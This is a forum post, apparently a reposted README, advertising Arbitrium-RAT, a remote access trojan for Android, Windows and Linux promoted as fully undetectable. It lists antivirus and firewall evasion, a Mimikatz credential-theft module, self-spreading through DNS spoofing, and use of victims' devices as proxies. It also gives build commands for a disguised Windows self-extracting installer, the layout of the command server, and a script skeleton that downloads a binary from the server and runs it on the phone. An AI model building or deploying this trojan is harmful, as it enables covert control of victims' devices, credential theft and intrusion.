Hacking Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


Posted by Soldier (joined 20.10.20)
Arbitrium is a cross-platform remote access trojan (RAT), Fully UnDetectable (FUD). It allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding. It gives access to the local networks: you can use the targets as an HTTP proxy, access the router, discover local IPs and scan their ports. It includes modules like Mimikatz, and new modules can easily be added. In addition, if Arbitrium is used with DNS spoofing software it can spread autonomously between devices (#AutoSpread). Arbitrium is a project of multiple parts, built using Java, JS, C, Python, Cordova and VueJS.

Demo:

Demo video

Features:

  • FUD
The client uses simple tools, which makes it completely undetectable; the trojan is based on netcat and mainly pipes TCP packets to run the server's commands.

  • Firewall
Arbitrium doesn't require adding an exception to the firewall or a port forwarding rule. The server is an API with endpoints that receive tasks for a specific target, and others that the trojan periodically requests to get new instructions. The instructions can be a JavaScript file (the Android app is made using Cordova) or a shell file to run in the terminal/CMD. Once the server receives a task for a device, it schedules the task and then opens a child process that waits for the trojan's response by listening on a dedicated ephemeral port. Therefore, the trojan doesn't need to listen on any port.

  • Battery optimization / StealthMode
Unlike stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei or Samsung's Android Pie ignore the permissions/exceptions given to an app by the user. So if you try to run an Android trojan in the background, the moment the app starts running frequent or heavy (in some cases even lightweight) tasks (e.g. sending HTTP requests periodically) it will be killed no matter what permissions the user grants; the OS completely ignores the current settings. dontkillmyapp.com is a well-known website dedicated to this particular issue.

The aforementioned issue was quite annoying while working on this project. After a while I found that building a lightweight binary that keeps running the assigned tasks in the background, while the MainActivity stands still just after launching the binary, appears to bypass most of the restrictions and actually even improves the performance of the app.

MainActivity receives a JS file from the server and uses ThreadPoolExecutor to launch the binary without waiting for it to exit (more on this under StealthMode/BatteryBypass).

  • Web interface
There is also a control panel. It's not a requirement but an extension: a simple VueJS webapp, a UI you can use to control the targets instead of directly sending requests to the API. The webapp is available here: Arbitrium WebApp

Requirements

  1. Android's client
Java ver ...
Cordova
Android SDK & NDK

  2. Windows/Linux client
Python3.6 (or newer)
PyInquirer
Winrar (Windows only)

Build

⚠️ Use setAPI_FQDN.sh first to set the server domain/IP in all files.
Clone repo:

git clone BenChaliah/Arbitrium-RAT --recursive

  1. Android
$ cd ArbitriumClients/AndroidApp/ClientApp/
$ cordova build android
$ cd ../StealthMode/
$ make clean && make build
The binaries inside /libs are stripped, so it is recommended to use these if you're not debugging.
  2. Windows
$ cd ArbitriumClients\WindowsApp
$ pyinstaller --onefile runFrame.py
$ copy Client_tools\toolbox.exe dist\
$ copy Client_tools\SFXAutoInstaller.conf dist\
$ copy Client_tools\start_script.vbs dist\
$ cd dist
$ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe

Components

  1. Server API
⚠️ The binaries built for Android should be put inside /assets (renamed to binary_{cpuabi}) and the APK will download them. If you wish to ship them inside the APK instead, make sure to extract them into the app data folder /data/data/package_name, or create a symbolic link inside it: window.MyOrangePlugin.exec("/system/bin/ln -s ...
$ pip install flask flask_cors && ./runserver.sh # Python2.7

├── runserver.sh
├── main.py
├── reverse_http.py
├── initProxy.py
├── assets (src: ArbitriumClients/AndroidApp/StealthMode)
│   ├── runFrame_arm64-v8a
│   ├── toolbox_arm64-v8a
│   └── ... (x86, x86_64, armeabi-v7a)
├── JS_scripts
│   ├── checkupdate.js
│   ├── init.js
│   ├── runshell.js
│   └── StealthMode.js
├── misc
├── modules
│   ├── discover.py
│   ├── mimikatz.py
│   ├── ports.py
│   └── runCMD.py
└── threads


  2. Client/Trojan (Android): The app is built using Cordova for its simplicity and support for cross-platform development. This app relies on two main parts:
    1. netbolt-orange-plugin:

      This is a Cordova plugin I made. It contains a few functions that can be called from index.html; scripts downloaded via /checkupdate.js mainly use these methods to run the assigned task:
      + exec() : executes a shell command and returns its output; it runs on the UI thread
      + poolexec() : same as exec(), but this one uses the ThreadPoolExecutor so the app can run a command without blocking the main thread; when the output is ready, it is sent via a callback together with the exit status
      + download() : downloads whatever resources the API or the admin may need to execute a task
  2. Example: The trojan first requests /checkupdate.js. Let's assume this is an Android phone and we want to initiate StealthMode/BatteryBypass to avoid getting killed (Battery optimizations ...). The API then responds with something like:
    function sfunc1(){
        window.MyOrangePlugin.download([{Link for ELF} ...], function(res){
            sfunc2(...);
        });
    }
    function sfunc2(...){
        window.MyOrangePlugin.exec("chmod ... ", function(res){
            sfunc3(...);
        });
    }
    function sfunc3(...){
        window.MyOrangePlugin.poolexec({Here we start the binary that will keep interacting with the API}, function(res){
            ...
        });
    }
    The app also uses a slightly customized version of Cordova background mode plugin.
